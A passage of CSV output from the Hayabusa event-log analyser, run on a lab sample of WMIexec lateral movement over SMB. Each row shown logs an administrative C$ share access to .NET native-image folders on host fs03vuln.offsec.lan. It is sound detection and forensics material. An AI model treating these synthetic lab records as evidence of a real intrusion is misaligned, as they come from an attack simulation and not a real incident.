+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.329 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.360 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 11:32:31.360 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.360 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.409 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.409 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.409 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.409 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.450 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.450 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 11:32:31.482 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.497 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.497 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.529 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.529 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.529 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.529 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:31.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 
